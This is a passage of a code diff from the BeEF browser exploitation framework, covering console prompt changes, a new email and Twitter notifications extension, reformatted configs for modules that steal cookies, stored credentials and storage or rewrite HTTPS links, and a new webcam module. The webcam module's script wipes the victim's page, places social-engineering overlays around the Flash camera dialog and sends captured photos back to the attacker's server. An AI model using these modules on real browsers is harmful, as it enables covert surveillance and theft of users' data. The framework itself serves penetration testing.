 	      driver.current_dispatcher.name != 'Core')
-
 	      driver.destack_dispatcher
-        driver.update_prompt('')
+          driver.update_prompt('')
       end
-    
+
       driver.enstack_dispatcher(Target)
-      driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ")
+      if driver.interface.targetid.length > 1
+        driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ")
+      else
+        driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ")
+      end
     end
   end
   
@@ -287,13 +300,16 @@ class Core
     if not driver.interface.setofflinetarget(args[0]).nil?
       if (driver.dispatcher_stack.size > 1 and
 	      driver.current_dispatcher.name != 'Core')
-
 	      driver.destack_dispatcher
-        driver.update_prompt('')
+          driver.update_prompt('')
       end
     
       driver.enstack_dispatcher(Target)
-      driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ")
+      if driver.interface.targetid.length > 1
+        driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ")
+      else
+        driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ")
+      end
     end  
     
   end
@@ -381,4 +397,4 @@ class Core
   
 end
 
-end end end end
+end end end end

extensions/console/lib/command_dispatcher/target.rb

@@ -28,7 +28,7 @@ class Target
     begin
       driver.interface.getcommands.each { |folder|
         folder['children'].each { |command|
-          @@commands << folder['text'] + "/" + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+          @@commands << folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
         }
       }
     rescue
@@ -73,9 +73,9 @@ class Target
     
     driver.interface.getcommands.each { |folder|
       folder['children'].each { |command|
-        tbl << [command['id'].to_s,
-                folder['text'] + "/" + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_"),
-                command['status'],
+        tbl << [command['id'].to_i,
+                folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_"),
+                command['status'].gsub(/^Verified /,""),
                 driver.interface.getcommandresponses(command['id']).length] #TODO
       }
     }
@@ -159,7 +159,12 @@ class Target
     
     driver.enstack_dispatcher(Command) if driver.dispatched_enstacked(Command) == false
     
-    driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] / "+driver.interface.cmd['Name']+" ")
+    if driver.interface.targetid.length > 1
+      driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] / "+driver.interface.cmd['Name']+" ")
+    else
+      driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] / "+driver.interface.cmd['Name']+" ")
+    end
+
   end
   
   def cmd_select_help(*args)
@@ -179,4 +184,4 @@ class Target
   
 end
   
-end end end end
+end end end end

extensions/console/lib/shellinterface.rb

@@ -60,6 +60,9 @@ class ShellInterface
     
     tree = []
     BeEF::Modules.get_categories.each { |c|
+        if c[-1,1] != "/"
+          c.concat("/")
+        end
         tree.push({
             'text' => c,
             'cls' => 'folder',
@@ -68,7 +71,21 @@ class ShellInterface
     }
 
     BeEF::Modules.get_enabled.each{|k, mod|
-      update_command_module_tree(tree, mod['category'], get_command_module_status(k), mod['name'],mod['db']['id'])
+
+      flatcategory = ""
+      if mod['category'].kind_of?(Array)
+        # Therefore this module has nested categories (sub-folders), munge them together into a string with '/' characters, like a folder.
+        mod['category'].each {|cat|
+          flatcategory << cat + "/"
+        }
+      else
+        flatcategory = mod['category']
+        if flatcategory[-1,1] != "/"
+          flatcategory.concat("/")
+        end
+      end
+
+      update_command_module_tree(tree, flatcategory, get_command_module_status(k), mod['name'],mod['db']['id'])
     }
 
     # if dynamic modules are found in the DB, then we don't have yaml config for them
@@ -245,7 +262,7 @@ class ShellInterface
         'os' => [BD.get(hook_session_id, 'OsName')]})
       
         when BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
-          return "Verfied Not Working"
+          return "Verified Not Working"
         when BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY
           return "Verified User Notify"
         when BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
@@ -336,7 +353,7 @@ class ShellInterface
 
       page_name_row = {
         'category' => 'Host',
-        'data' => encoded_date_stamp,
+        'data' => encoded_date_stamp_hash,
         'from' => 'Initialization'
       }
 
@@ -358,6 +375,21 @@ class ShellInterface
       summary_grid_hash['results'].push(page_name_row) # add the row
     end
 
+    # set and add the return values for the os name
+    hw_name = BD.get(self.targetsession, 'Hardware')
+    if not hw_name.nil?
+      encoded_hw_name = CGI.escapeHTML(hw_name)
+      encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
+
+      page_name_row = {
+        'category' => 'Host',
+        'data' => encoded_hw_name_hash,
+        'from' => 'Initialization'
+      }
+
+      summary_grid_hash['results'].push(page_name_row) # add the row
+    end
+
     # set and add the return values for the browser name
     browser_name = BD.get(self.targetsession, 'BrowserName') 
     if not browser_name.nil?
@@ -535,6 +567,21 @@ class ShellInterface
       summary_grid_hash['results'].push(page_name_row) # add the row
     end
 
+    # set and add the yes|no value for HasPhonegap
+    has_phonegap = BD.get(self.targetsession, 'HasPhonegap')
+    if not has_phonegap.nil?
+      encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
+      encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
+
+      page_name_row = {
+        'category' => 'Browser',
+        'data' => encoded_has_phonegap_hash,
+        'from' => 'Initialization'
+      }
+
+      summary_grid_hash['results'].push(page_name_row) # add the row
+    end
+
     # set and add the yes|no value for HasGoogleGears
     has_googlegears = BD.get(self.targetsession, 'HasGoogleGears')
     if not has_googlegears.nil?

extensions/evasion/config.yaml

@@ -25,4 +25,4 @@ beef:
               beef: "beef"
               Beef: "Beef"
               evercookie: "evercookie"
-            chain: ["scramble","minify","base_64"]
+            chain: ["scramble", "minify", "base_64"]

extensions/evasion/evasion.rb

@@ -37,10 +37,10 @@ module BeEF
               #2. call the "execute" method of the ruby module, passing the input
               #3. update the input in order that next technique will work on the pre-processed input.
               if File.exists?("#{$root_dir}/extensions/evasion/obfuscation/#{technique}.rb")
-                print_debug "[OBFUSCATION] Applying technique [#{technique}]"
                 klass = BeEF::Extension::Evasion.const_get(technique.capitalize).instance
                 is_bootstrap_needed = klass.need_bootstrap
                 if is_bootstrap_needed
+                  print_debug "[OBFUSCATION] Adding bootstrapper for technique [#{technique}]"
                   @bootstrap += klass.get_bootstrap
                 end
               end

extensions/notifications/channels/email.rb

@@ -0,0 +1,60 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+#
+#
+require 'net/smtp'
+
+module BeEF
+module Extension
+module Notifications
+module Channels
+  
+  class Email
+
+    #
+    # Constructor
+    #
+    def initialize(to_address, message)
+      @config = BeEF::Core::Configuration.instance
+      @from_address       = @config.get('beef.extension.notifications.email.from_address')
+      @smtp_host    = @config.get('beef.extension.notifications.email.smtp_host')
+      @smtp_port = @config.get('beef.extension.notifications.email.smtp_port')
+      @smtp_tls_enable = @config.get('beef.extension.notifications.email.smtp_tls_enable')
+      @password = @config.get('beef.extension.notifications.email.smtp_tls_password')
+
+      # configure the email client
+      msg = "Subject: BeEF Notification\n\n" + message
+      smtp = Net::SMTP.new @smtp_host, @smtp_port
+      #if @smtp_tls_enable?
+      #  smtp.enable_starttls
+      #  smtp.start('beefproject.com', @from_address, @password, :login) do
+      #    smtp.send_message(msg, @from_address, @to_address)
+      #  end
+      #else
+        smtp.start do
+          smtp.send_message(msg, @from_address, to_address)
+        end
+      #end
+
+    end
+
+  end
+  
+end
+end
+end
+end
+

extensions/notifications/channels/tweet.rb

@@ -0,0 +1,49 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+#
+#
+require 'twitter'
+
+module BeEF
+module Extension
+module Notifications
+module Channels
+  
+  class Tweet
+
+    #
+    # Constructor
+    #
+    def initialize(username, message)
+      @config = BeEF::Core::Configuration.instance
+
+      # configure the Twitter client
+      Twitter.configure do |config|
+        config.consumer_key       = @config.get('beef.extension.notifications.twitter.consumer_key')
+        config.consumer_secret    = @config.get('beef.extension.notifications.twitter.consumer_secret')
+        config.oauth_token    = @config.get('beef.extension.notifications.twitter.oauth_token')
+        config.oauth_token_secret = @config.get('beef.extension.notifications.twitter.oauth_token_secret')
+      end
+
+      Twitter.direct_message_create(username, message)
+    end
+  end
+  
+end
+end
+end
+end
+

extensions/notifications/config.yaml

@@ -0,0 +1,33 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    extension:
+        notifications:
+            enable: false 
+            name: Notifications
+            twitter:
+              enable: false
+              consumer_key: app_consumer_key
+              consumer_secret: app_consumer_secret
+              oauth_token: your_oauth_token_for_this_app
+              oauth_token_secret: your_oauth_token_secret_for_this_app
+              target_username: 
+            email:
+              enable: false
+              from_address: sender_email_address
+              to_address: receipient_email_address
+              smtp_host: 127.0.0.1
+              smtp_port: 25

extensions/notifications/extension.rb

@@ -0,0 +1,30 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+module Extension
+module Notifications
+  
+  extend BeEF::API::Extension
+  
+  @short_name = 'notifications'
+  @full_name = 'Notifications'
+  @description = 'Generates external notifications for events in BeEF'
+  
+end
+end
+end
+
+require 'extensions/notifications/notifications'

extensions/notifications/notifications.rb

@@ -0,0 +1,57 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+
+require 'extensions/notifications/channels/tweet'
+require 'extensions/notifications/channels/email'
+
+module BeEF
+module Extension
+module Notifications
+
+  #
+  # Notifications class
+  #
+  class Notifications
+
+    def initialize(from, event, time_now, hb)
+      @config = BeEF::Core::Configuration.instance
+      if @config.get('beef.extension.notifications.enable') == false
+        # notifications are not enabled
+        return nil
+      else
+        @from = from
+        @event = event
+        @time_now = time_now
+        @hb = hb
+      end
+
+      message = "#{from} #{event} #{time_now} #{hb}"
+
+      if @config.get('beef.extension.notifications.twitter.enable') == true
+        username = @config.get('beef.extension.notifications.twitter.target_username')
+        BeEF::Extension::Notifications::Channels::Tweet.new(username,message)
+      end
+
+      if @config.get('beef.extension.notifications.email.enable') == true
+        to_address    = @config.get('beef.extension.notifications.email.to_address')
+        BeEF::Extension::Notifications::Channels::Email.new(to_address,message)
+      end
+    end
+
+  end
+  
+end
+end
+end

extensions/proxy/api.rb

@@ -14,33 +14,33 @@
 #   limitations under the License.
 #
 module BeEF
-module Extension
-module Proxy 
-module API  
+  module Extension
+    module Proxy
+      module API
 
-  module RegisterHttpHandler
+        module RegisterHttpHandler
 
-    BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'pre_http_start')
-    BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
-    
-    def self.pre_http_start(http_hook_server)
-      config = BeEF::Core::Configuration.instance
-        Thread.new{
-          http_hook_server.semaphore.synchronize{
-            BeEF::Extension::Proxy::Proxy.new
-          }
-        }
-        print_success "HTTP Proxy: http://#{config.get('beef.extension.proxy.address')}:#{config.get('beef.extension.proxy.port')}"
+          BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'pre_http_start')
+          BeEF::API::Registrar.instance.register(BeEF::Extension::Proxy::API::RegisterHttpHandler, BeEF::API::Server, 'mount_handler')
+
+          def self.pre_http_start(http_hook_server)
+            config = BeEF::Core::Configuration.instance
+            Thread.new{
+              http_hook_server.semaphore.synchronize{
+                BeEF::Extension::Proxy::Proxy.new
+              }
+            }
+            print_info "HTTP Proxy: http://#{config.get('beef.extension.proxy.address')}:#{config.get('beef.extension.proxy.port')}"
+          end
+
+          def self.mount_handler(beef_server)
+            beef_server.mount('/proxy', BeEF::Extension::Requester::Handler)
+          end
+
+        end
+
+
+      end
     end
-
-    def self.mount_handler(beef_server)
-      beef_server.mount('/proxy', BeEF::Extension::Requester::Handler)
-    end
-    
   end
-
-
-end
-end
-end
 end

modules/browser/get_visited_domains/config.yaml

@@ -22,5 +22,5 @@ beef:
             description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
             authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
             target:
-                working: ["FF","IE"]
-                not_working: ["O","C","S"]
+                working: ["FF", "IE"]
+                not_working: ["O", "C", "S"]

modules/browser/hooked_domain/ajax_fingerprint/config.yaml

@@ -17,11 +17,11 @@ beef:
     module:
         ajax_fingerprint:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "Fingerprint Ajax"
             description: "Fingerprint Ajax and JS libraries present on the hooked page."
             authors: ["qswain"]
             target:
-                working: ["FF","S"]
+                working: ["FF", "S"]
                 not_working: ["C"]
 

modules/browser/hooked_domain/alert_dialog/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         alert_dialog:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "Create Alert Dialog"
             description: "Sends an alert dialog to the hooked browser."
             authors: ["wade", "bm"]

modules/browser/hooked_domain/deface_web_page/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         deface_web_page:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "Replace Content (Deface)"
             description: "Overwrite the page, title and shortcut icon on the hooked page."
             authors: ["antisnatchor"]

modules/browser/hooked_domain/get_cookie/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         get_cookie:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "Get Cookie"
             description: "This module will retrieve the session cookie from the current page."
             authors: ["bcoles"]

modules/browser/hooked_domain/get_local_storage/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         get_local_storage:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "Get Local Storage"
             description: "Extracts data from the HTML5 localStorage object."
             authors: ["bcoles"]

modules/browser/hooked_domain/get_page_html/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         get_page_html:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "Get Page HTML"
             description: "This module will retrieve the HTML from the current page."
             authors: ["bcoles"]

modules/browser/hooked_domain/get_page_links/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         get_page_links:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "Get Page HREFs"
             description: "This module will retrieve HREFs from the target page."
             authors: ["vo"]

modules/browser/hooked_domain/get_session_storage/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         get_session_storage:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "Get Session Storage"
             description: "Extracts data from the HTML5 sessionStorage object."
             authors: ["bcoles"]

modules/browser/hooked_domain/get_stored_credentials/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         get_stored_credentials:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "Get Stored Credentials"
             description: "This module retrieves saved username/password combinations from the login page on the hooked domain.<br /><br />It will fail if more than one set of domain credentials are saved in the browser."
             authors: ["bcoles"]

modules/browser/hooked_domain/link_rewrite/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         link_rewrite:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "Replace HREFs"
             description: "This module will rewrite all the href attributes of all matched links."
             authors: ["passbe"]

modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         link_rewrite_sslstrip:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "Replace HREFs (HTTPS)"
             description: "This module will rewrite all the href attributes of HTTPS links to use HTTP instead of HTTPS. Links relative to the web root are not rewritten."
             authors: ["bcoles"]

modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml

@@ -17,14 +17,14 @@ beef:
     module:
         mobilesafari_address_spoofing:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "iOS Address Bar Spoofing"
             description: "Mobile Safari iOS 5.1 Address Bar Spoofing. This is fixed in latest version of Mobile Safari (the URL turns 'blank')"
-            authors: ["bcoles","xntrik","majorsecurity.net"]
+            authors: ["bcoles", "xntrik", "majorsecurity.net"]
             target:
                 working:
                     S:
-                        os: ["iPhone"]
+                        os: ["iOS"]
                 not_working:
                     ALL:
                         os: ["All"]

modules/browser/hooked_domain/prompt_dialog/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         prompt_dialog:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "Create Prompt Dialog"
             description: "Sends a prompt dialog to the hooked browser."
             authors: ["wade", "bm"]

modules/browser/hooked_domain/replace_video/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         replace_video:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "Replace Videos"
             description: "Replaces an object selected with jQuery (all embed tags by default) with an embed tag containing the youtube video of your choice (rickroll by default)."
             authors: ["Yori Kvitchko", "antisnatchor"]

modules/browser/hooked_domain/rickroll/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         rickroll:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "Redirect Browser (Rickroll)"
             description: "Overwrite the body of the page the victim is on with a full screen Rickroll."
             authors: ["Yori Kvitchko"]

modules/browser/hooked_domain/site_redirect/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         site_redirect:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "Redirect Browser"
             description: "This module will redirect the selected hooked browser to the address specified in the 'Redirect URL' input."
             authors: ["wade", "vo"]

modules/browser/hooked_domain/site_redirect_iframe/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         site_redirect_iframe:
             enable: true
-            category: ["Browser","Hooked Domain"]
+            category: ["Browser", "Hooked Domain"]
             name: "Redirect Browser (iFrame)"
             description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title, page shortcut icon and the time delay are specified in the parameters below.<br><br>The content of the URL bar will not be changed in the hooked browser."
             authors: ["ethicalhack3r", "Yori Kvitchko"]

modules/browser/webcam/command.js

@@ -0,0 +1,70 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+
+
+beef.execute(function() {
+    
+    /*
+    If you ever experience that the "Allow button" of the flash warning is not clickable, it can have several reasons:
+    - Some CSS/Flash bug: http://stackoverflow.com/questions/3003724/cant-click-allow-button-in-flash-on-firefox
+    - There is a bug in flash: http://forums.adobe.com/thread/880967
+    - You overlayed (a single pixel is enough) the warning message with something (e.g. a div). Try to not include the
+      body_social_engineer_and_overlay below and try again.
+    */
+    
+    
+    //The social engineering message and the overlay div's
+    var body_social_engineer_and_overlay = '<div class="thingy" style="position:absolute;top:0px;left:0px;width:800px;height:109px"></div> <div class="thingy" style="position:absolute;top:105px;left:0px;width:100px;height:315px"></div> <div class="thingy" style="position:absolute;top:105px;left:315px;width:570px;height:315px"></div> <div class="thingy" style="position:absolute;top:248px;left:0px;width:400px;height:280px"></div><div class="text" style="position:absolute;top:20px;left:50px;z-index:100"> <h2 style="margin:0"><%= @social_engineering_title %></h2> <p style="width: 500px; font-size: 14px; margin:0"><%= @social_engineering_text %></p></div>';
+    
+    
+    //These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string
+    var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "picture="+picture); }; function allPicturesTaken(){  }';
+    
+    //This function is called by swfobject, if if fails to add the flash file to the page
+    
+    js_functions += 'function swfobjectCallback(e) { if(e.success){beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");}else{beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");} };</script>';
+    
+    
+    //Either do the overlay (body_social_engineer_and_overlay) or do something like in the next line (showing a message if adobe flash is not installed)
+    //We'll notice when flash is not installed anyway...
+    //var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:300px;height:300px;opacity:0.8;"><div><h1>You need FlashPlayer 9 or higher!</h1><p><a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /></a></p></div></div>';
+    var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:300px;height:300px;opacity:0.8;"></div>';
+    
+    
+    //The style is the only thing we already append to the head
+	var theHead = document.getElementsByTagName("head")[0];         
+	var style = document.createElement('style');
+    style.type = 'text/css';
+    style.innerHTML = 'body { background: #eee; } .thingy { z-index:50; background-color:#eee; border:1px solid #eee; }';
+    theHead.appendChild(style);
+    
+    //A nice library that helps us to include the swf file
+    var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
+    
+    //This is the javascript that actually calls the swfobject library to include the swf file 
+    var include_script = '<script>var flashvars = {\'no_of_pictures\':\'<%= @no_of_pictures %>\', \'interval\':\'<%= @interval %>\'}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/takeit.swf", "main", "403", "345", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
+    
+    //Empty body first
+    $j('body').html('');
+    //Now show our flash stuff, muahahaha
+    $j('body').append(js_functions, swfobject_script, body_flash_container, body_social_engineer_and_overlay, include_script);
+    
+});
+
+
+
+
+

modules/browser/webcam/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        webcam:
+            enable: true
+            category: "Browser"
+            name: "Webcam"
+            description: "This module will show the Adobe Flash 'Allow Webcam' dialog to the user. The user has to click the allow button, otherwise this module will not return pictures.<br />The title/text to convince the user can be customised. You can customise how many pictures you want to take and in which interval (default will take 20 pictures, 1 picture per second). The picture is sent as a base64 encoded JPG string."
+            authors: ["floyd @floyd_ch"]
+            target:
+                 working: ["All"]

modules/browser/webcam/dev/com/adobe/images/BitString.as

@@ -0,0 +1,39 @@
+/*
+  Copyright (c) 2008, Adobe Systems Incorporated
+  All rights reserved.
+
+  Redistribution and use in source and binary forms, with or without 
+  modification, are permitted provided that the following conditions are
+  met:
+
+  * Redistributions of source code must retain the above copyright notice, 
+    this list of conditions and the following disclaimer.
+  
+  * Redistributions in binary form must reproduce the above copyright
+    notice, this list of conditions and the following disclaimer in the 
+    documentation and/or other materials provided with the distribution.
+  
+  * Neither the name of Adobe Systems Incorporated nor the names of its 
+    contributors may be used to endorse or promote products derived from 
+    this software without specific prior written permission.
+
+  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
+  IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
+  THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+  PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+  CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
+  EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
+  PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
+  PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
+  LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
+  NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+  SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+package com.adobe.images
+{
+	public class BitString
+	{
+		public var len:int = 0;
+		public var val:int = 0;
+	}
+}

modules/browser/webcam/dev/com/adobe/images/JPGEncoder.as

@@ -0,0 +1,648 @@
+/*
+  Copyright (c) 2008, Adobe Systems Incorporated
+  All rights reserved.
+
+  Redistribution and use in source and binary forms, with or without 
+  modification, are permitted provided that the following conditions are
+  met:
+
+  * Redistributions of source code must retain the above copyright notice, 
+    this list of conditions and the following disclaimer.
+  
+  * Redistributions in binary form must reproduce the above copyright
+    notice, this list of conditions and the following disclaimer in the 
+    documentation and/or other materials provided with the distribution.
+  
+  * Neither the name of Adobe Systems Incorporated nor the names of its 
+    contributors may be used to endorse or promote products derived from 
+    this software without specific prior written permission.
+
+  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
+  IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
+  THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+  PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+  CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
+  EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
+  PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
+  PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
+  LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
